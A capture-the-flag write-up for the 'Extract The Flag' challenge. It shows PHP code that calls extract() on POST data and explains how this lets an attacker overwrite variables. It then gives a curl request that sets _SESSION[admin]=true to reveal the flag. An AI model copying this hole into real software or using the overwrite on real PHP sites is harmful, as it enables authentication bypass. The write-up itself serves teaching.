Extract The Flag

Description

Solution

<?php
if (isset($_GET['src'])) {
    highlight_file(__FILE__);
    die();
}

error_reporting(0);
include_once 'flag.php';
session_start();
$_SESSION['admin'] = false;
extract($_POST);
?>
...
<div class="row">
    <div class="card">
        <h4>Flag</h4>
        <!-- admin content -->
        <?php
        if (isset($_SESSION['admin'])) {
            if ($_SESSION['admin']) {
                echo "Your flag: " . $flag;
                echo "<br>";
            }
        }
        ?>
    </div>
</div>
...

The vulnaribility with given php code is extract. Basically if you pass array such as [name=>Ryan],after extract you will have access to variable named name with value Ryan. This introduces vulnaribility because we can also overwrite variables.

➜ curl -X POST 'https://extracttheflag.ctf.cert.unlp.edu.ar/' -d "_SESSION[admin]=true"
...
<div class="row">
    <div class="card">
        <h4>Flag</h4>
        <!-- admin content -->
        Your flag: flag{PhP_Th4nks_for_all!}<br>
    </div>
</div>
...

Flag: flag{PhP_Th4nks_for_all!}

PreviousDo Not Trust My Calculator NextMaster JWT

Last updated 8 months ago

hashtagDescription

hashtagSolution

Description

Solution